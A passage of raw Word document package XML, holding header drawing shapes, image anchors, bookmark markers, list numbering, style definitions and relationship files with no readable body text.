                        <ns0:rect l="l" t="t" r="r" b="b"/>
                        <ns0:pathLst>
                          <ns0:path w="5713601" h="330200">
                            <ns0:moveTo>
                              <ns0:pt x="0" y="330200"/>
                            </ns0:moveTo>
                            <ns0:lnTo>
                              <ns0:pt x="5713601" y="330200"/>
                            </ns0:lnTo>
                            <ns0:lnTo>
                              <ns0:pt x="5713601" y="0"/>
                            </ns0:lnTo>
                            <ns0:lnTo>
                              <ns0:pt x="0" y="0"/>
                            </ns0:lnTo>
                            <ns0:lnTo>
                              <ns0:pt x="0" y="3302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D1117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5713601,3302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303" name="Image 303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4"/>
    <w:bookmarkEnd w:id="30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5"/>
    <w:bookmarkEnd w:id="30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6"/>
    <w:bookmarkEnd w:id="30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7"/>
    <w:bookmarkEnd w:id="30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08"/>
    <w:bookmarkEnd w:id="308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309"/>
    <w:bookmarkEnd w:id="309"/>
  </w:p>
</w:hdr>
</file>

<file path=word/header6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373"/>
    <w:bookmarkEnd w:id="373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374" name="Image 374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1979930</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>867915</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="3600001" cy="2314285"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="375" name="Image 375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375" name="89A292D2-E884-4D80-C766-95157713DF41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3600001" cy="2314285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376" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:156pt;margin-top:68pt;width:283pt;height:18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922655</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>4807455</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5714365" cy="495935"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="377" name="Image 377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73pt;margin-top:379pt;width:450pt;height:3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545" y="631"/>
                        <ns0:ext cx="5713601" cy="495300"/>
                      </ns0:xfrm>
                      <ns0:custGeom>
                        <ns0:rect l="l" t="t" r="r" b="b"/>
                        <ns0:pathLst>
                          <ns0:path w="5713601" h="495300">
                            <ns0:moveTo>
                              <ns0:pt x="0" y="495300"/>
                            </ns0:moveTo>
                            <ns0:lnTo>
                              <ns0:pt x="5713601" y="495300"/>
                            </ns0:lnTo>
                            <ns0:lnTo>
                              <ns0:pt x="5713601" y="0"/>
                            </ns0:lnTo>
                            <ns0:lnTo>
                              <ns0:pt x="0" y="0"/>
                            </ns0:lnTo>
                            <ns0:lnTo>
                              <ns0:pt x="0" y="4953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D1117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5713601,4953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1979930</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>5950455</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="3600001" cy="2314286"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="378" name="Image 378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378" name="F4496885-AC90-4816-AAED-CB55E191278E"/>
                      <ns1:cNvPicPr/>
                    </ns1:nvPicPr>
                    <ns1:blipFill>
                      <ns0:blip r:embed="rId2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3600001" cy="2314286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379" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:156pt;margin-top:469pt;width:283pt;height:18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2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380" name="Image 380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81"/>
    <w:bookmarkEnd w:id="38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82"/>
    <w:bookmarkEnd w:id="38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83"/>
    <w:bookmarkEnd w:id="38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84"/>
    <w:bookmarkEnd w:id="38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85"/>
    <w:bookmarkEnd w:id="385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386"/>
    <w:bookmarkEnd w:id="386"/>
  </w:p>
</w:hdr>
</file>

<file path=word/header7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447"/>
    <w:bookmarkEnd w:id="447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448" name="Image 448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923200" y="868329"/>
                          <ns0:ext cx="5713601" cy="495300"/>
                        </ns0:xfrm>
                        <ns0:custGeom>
                          <ns0:rect l="l" t="t" r="r" b="b"/>
                          <ns0:pathLst>
                            <ns0:path w="5713601" h="495300">
                              <ns0:moveTo>
                                <ns0:pt x="0" y="495300"/>
                              </ns0:moveTo>
                              <ns0:lnTo>
                                <ns0:pt x="5713601" y="495300"/>
                              </ns0:lnTo>
                              <ns0:lnTo>
                                <ns0:pt x="57136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953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1979930</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>1515615</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="3600001" cy="2314285"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="449" name="Image 449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449" name="4F1EEB09-481D-4939-0716-1FD9841C1E08"/>
                      <ns1:cNvPicPr/>
                    </ns1:nvPicPr>
                    <ns1:blipFill>
                      <ns0:blip r:embed="rId1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3600001" cy="2314285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450" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:156pt;margin-top:119pt;width:283pt;height:18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1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922655</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>5175755</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5714365" cy="661035"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="451" name="Image 451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73pt;margin-top:408pt;width:450pt;height:5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545" y="631"/>
                        <ns0:ext cx="5713601" cy="660400"/>
                      </ns0:xfrm>
                      <ns0:custGeom>
                        <ns0:rect l="l" t="t" r="r" b="b"/>
                        <ns0:pathLst>
                          <ns0:path w="5713601" h="660400">
                            <ns0:moveTo>
                              <ns0:pt x="0" y="660400"/>
                            </ns0:moveTo>
                            <ns0:lnTo>
                              <ns0:pt x="5713601" y="660400"/>
                            </ns0:lnTo>
                            <ns0:lnTo>
                              <ns0:pt x="5713601" y="0"/>
                            </ns0:lnTo>
                            <ns0:lnTo>
                              <ns0:pt x="0" y="0"/>
                            </ns0:lnTo>
                            <ns0:lnTo>
                              <ns0:pt x="0" y="6604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D1117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5713601,6604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6039355</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5040000" cy="2937461"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="452" name="Image 452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openxmlformats.org/drawingml/2006/picture">
                  <ns1:pic xmlns:ns1="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
                    <ns1:nvPicPr>
                      <ns1:cNvPr id="452" name="12BF723B-167D-4270-B154-F8E5F422B40B"/>
                      <ns1:cNvPicPr/>
                    </ns1:nvPicPr>
                    <ns1:blipFill>
                      <ns0:blip r:embed="rId2">
                        <ns0:extLst>
                          <ns0:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                            <ns2:useLocalDpi xmlns:ns2="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                          </ns0:ext>
                        </ns0:extLst>
                      </ns0:blip>
                      <ns0:srcRect/>
                      <ns0:stretch>
                        <ns0:fillRect/>
                      </ns0:stretch>
                    </ns1:blipFill>
                    <ns1:spPr>
                      <ns0:xfrm>
                        <ns0:off x="0" y="0"/>
                        <ns0:ext cx="5040000" cy="2937461"/>
                      </ns0:xfrm>
                      <ns0:prstGeom prst="rect">
                        <ns0:avLst/>
                      </ns0:prstGeom>
                    </ns1:spPr>
                  </ns1:pic>
                </ns0:graphicData>
              </ns0:graphic>
              <ns0:sizeRelH xmlns:ns0="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" relativeFrom="margin">
                <ns0:pctWidth>0</ns0:pctWidth>
              </ns0:sizeRelH>
              <ns0:sizeRelV xmlns:ns0="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" relativeFrom="margin">
                <ns0:pctHeight>0</ns0:pctHeight>
              </ns0:sizeRelV>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <ns0:pic xmlns:ns0="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <v:shapetype xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe" filled="false" stroked="false">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="true" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape xmlns:v="urn:schemas-microsoft-com:vml" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" id="Image453" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:99pt;margin-top:476pt;width:397pt;height:23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<v:imagedata r:id="rId2"/>
            </v:shape>
          </ns0:pic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795655</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>9434066</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5968365" cy="254635"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="454" name="Image 454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63pt;margin-top:743pt;width:470pt;height:2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545" y="581"/>
                        <ns0:ext cx="5967601" cy="254000"/>
                      </ns0:xfrm>
                      <ns0:custGeom>
                        <ns0:rect l="l" t="t" r="r" b="b"/>
                        <ns0:pathLst>
                          <ns0:path w="5967601" h="254000">
                            <ns0:moveTo>
                              <ns0:pt x="0" y="254000"/>
                            </ns0:moveTo>
                            <ns0:lnTo>
                              <ns0:pt x="5967601" y="254000"/>
                            </ns0:lnTo>
                            <ns0:lnTo>
                              <ns0:pt x="5967601" y="0"/>
                            </ns0:lnTo>
                            <ns0:lnTo>
                              <ns0:pt x="0" y="0"/>
                            </ns0:lnTo>
                            <ns0:lnTo>
                              <ns0:pt x="0" y="2540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161B22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5967601,254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455" name="Image 455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56"/>
    <w:bookmarkEnd w:id="45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57"/>
    <w:bookmarkEnd w:id="45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58"/>
    <w:bookmarkEnd w:id="45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59"/>
    <w:bookmarkEnd w:id="45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60"/>
    <w:bookmarkEnd w:id="460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461"/>
    <w:bookmarkEnd w:id="461"/>
  </w:p>
</w:hdr>
</file>

<file path=word/header8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523"/>
    <w:bookmarkEnd w:id="523"/>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
        <mc:Choice Requires="wpc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10692132"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="524" name="Image 524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Canvas">
                  <wpc:wpc style="position:absolute;left:0;text-align:left;margin-left:0pt;margin-top:-0pt;width:595pt;height:84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wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <ns0:xfrm>
                          <ns0:off x="0" y="130"/>
                          <ns0:ext cx="7560001" cy="10692000"/>
                        </ns0:xfrm>
                        <ns0:custGeom>
                          <ns0:rect l="l" t="t" r="r" b="b"/>
                          <ns0:pathLst>
                            <ns0:path w="7560001" h="10692000">
                              <ns0:moveTo>
                                <ns0:pt x="0" y="10692000"/>
                              </ns0:moveTo>
                              <ns0:lnTo>
                                <ns0:pt x="7560001" y="10692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10692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D1117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0" y="10224130"/>
                          <ns0:ext cx="7560001" cy="468000"/>
                        </ns0:xfrm>
                        <ns0:custGeom>
                          <ns0:rect l="l" t="t" r="r" b="b"/>
                          <ns0:pathLst>
                            <ns0:path w="7560001" h="468000">
                              <ns0:moveTo>
                                <ns0:pt x="0" y="468000"/>
                              </ns0:moveTo>
                              <ns0:lnTo>
                                <ns0:pt x="7560001" y="468000"/>
                              </ns0:lnTo>
                              <ns0:lnTo>
                                <ns0:pt x="7560001" y="0"/>
                              </ns0:lnTo>
                              <ns0:lnTo>
                                <ns0:pt x="0" y="0"/>
                              </ns0:lnTo>
                              <ns0:lnTo>
                                <ns0:pt x="0" y="46800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14144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00E5FF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17446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20748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C2128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24050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27352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C2128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30654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33956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C2128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37258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61B22">
                            <ns0:alpha val="100000"/>
                          </ns0:srgbClr>
                        </ns0:solidFill>
                      </wps:spPr>
                      <wps:bodyPr/>
                    </wps:wsp>
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <ns0:xfrm>
                          <ns0:off x="720000" y="4056030"/>
                          <ns0:ext cx="6120001" cy="330200"/>
                        </ns0:xfrm>
                        <ns0:custGeom>
                          <ns0:rect l="l" t="t" r="r" b="b"/>
                          <ns0:pathLst>
                            <ns0:path w="6120001" h="330200">
                              <ns0:moveTo>
                                <ns0:pt x="0" y="0"/>
                              </ns0:moveTo>
                              <ns0:lnTo>
                                <ns0:pt x="6120001" y="0"/>
                              </ns0:lnTo>
                              <ns0:lnTo>
                                <ns0:pt x="6120001" y="330200"/>
                              </ns0:lnTo>
                              <ns0:lnTo>
                                <ns0:pt x="0" y="330200"/>
                              </ns0:lnTo>
                              <ns0:lnTo>
                                <ns0:pt x="0" y="0"/>
                              </ns0:lnTo>
                              <ns0:close/>
                            </ns0:path>
                          </ns0:pathLst>
                        </ns0:custGeom>
                        <ns0:solidFill>
                          <ns0:srgbClr val="1C2128">
                            <ns0:alpha val="100000"/>
                          </ns0:srgbClr>
                        </ns0:solidFill>
                      </wps:spPr>
                      <wps:bodyPr/>
                    </wps:wsp>
                  </wpc:wpc>
                </ns0:graphicData>
              </ns0:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:shape xmlns:v="urn:schemas-microsoft-com:vml" id="_x0000_t202" coordsize="7560001,10692000"/>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="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-130</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="7560310" cy="64136"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="525" name="Image 525"/>
              <wp:cNvGraphicFramePr>
                <ns0:graphicFrameLocks xmlns:ns0="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
              </wp:cNvGraphicFramePr>
              <ns0:graphic xmlns:ns0="http://schemas.openxmlformats.org/drawingml/2006/main">
                <ns0:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp style="position:absolute;left:0;text-align:left;margin-left:0pt;margin-top:-0pt;width:595pt;height:5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<wps:cNvSpPr/>
                    <wps:spPr>
                      <ns0:xfrm>
                        <ns0:off x="0" y="130"/>
                        <ns0:ext cx="7560001" cy="63500"/>
                      </ns0:xfrm>
                      <ns0:custGeom>
                        <ns0:rect l="l" t="t" r="r" b="b"/>
                        <ns0:pathLst>
                          <ns0:path w="7560001" h="63500">
                            <ns0:moveTo>
                              <ns0:pt x="0" y="63500"/>
                            </ns0:moveTo>
                            <ns0:lnTo>
                              <ns0:pt x="7560001" y="63500"/>
                            </ns0:lnTo>
                            <ns0:lnTo>
                              <ns0:pt x="7560001" y="0"/>
                            </ns0:lnTo>
                            <ns0:lnTo>
                              <ns0:pt x="0" y="0"/>
                            </ns0:lnTo>
                            <ns0:lnTo>
                              <ns0:pt x="0" y="63500"/>
                            </ns0:lnTo>
                            <ns0:close/>
                          </ns0:path>
                        </ns0:pathLst>
                      </ns0:custGeom>
                      <ns0:solidFill>
                        <ns0:srgbClr val="00E5FF">
                          <ns0:alpha val="100000"/>
                        </ns0:srgbClr>
                      </ns0:solidFill>
                    </wps:spPr>
                    <wps:bodyPr/>
                  </wps:wsp>
                </ns0:graphicData>
              </ns0:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:shape xmlns:v="urn:schemas-microsoft-com:vml" id="_x0000_t202" coordsize="7560001,63500"/>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r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26"/>
    <w:bookmarkEnd w:id="526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27"/>
    <w:bookmarkEnd w:id="52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28"/>
    <w:bookmarkEnd w:id="52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29"/>
    <w:bookmarkEnd w:id="52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30"/>
    <w:bookmarkEnd w:id="530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531"/>
    <w:bookmarkEnd w:id="531"/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500"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="845" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:color w:val="0D1117"/>
        <w:b w:val="true"/>
        <w:i w:val="false"/>
        <w:position w:val="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462" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:color w:val="C9D1D9"/>
        <w:b w:val="false"/>
        <w:i w:val="false"/>
        <w:position w:val="0"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3">
    <w:multiLevelType w:val="singleLevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="3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4">
    <w:multiLevelType w:val="singleLevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="4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5">
    <w:multiLevelType w:val="singleLevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="5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6">
    <w:multiLevelType w:val="singleLevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="7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7">
    <w:multiLevelType w:val="singleLevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="8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8">
    <w:multiLevelType w:val="singleLevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="9"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="182" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
        <w:color w:val="00E5FF"/>
        <w:b w:val="true"/>
        <w:i w:val="false"/>
        <w:position w:val="0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ind w:left="462" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:color w:val="C9D1D9"/>
        <w:b w:val="false"/>
        <w:i w:val="false"/>
        <w:position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  <w:style w:styleId="Heading1" w:type="paragraph">
    <w:name w:val="Heading 1"/>
  </w:style>
  <w:style w:styleId="Heading2" w:type="paragraph">
    <w:name w:val="Heading 2"/>
  </w:style>
  <w:style w:styleId="Heading3" w:type="paragraph">
    <w:name w:val="Heading 3"/>
  </w:style>
  <w:style w:styleId="Heading4" w:type="paragraph">
    <w:name w:val="Heading 4"/>
  </w:style>
  <w:style w:styleId="Heading5" w:type="paragraph">
    <w:name w:val="Heading 5"/>
  </w:style>
  <w:style w:styleId="Heading6" w:type="paragraph">
    <w:name w:val="Heading 6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footer4.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>
</file>

<file path=word/_rels/footer5.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>
</file>

<file path=word/_rels/footer6.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>
</file>

<file path=word/_rels/footer7.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>
</file>

<file path=word/_rels/footer8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0.jpe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/Relationships>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6.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jpeg"/></Relationships>
</file>

<file path=word/_rels/header8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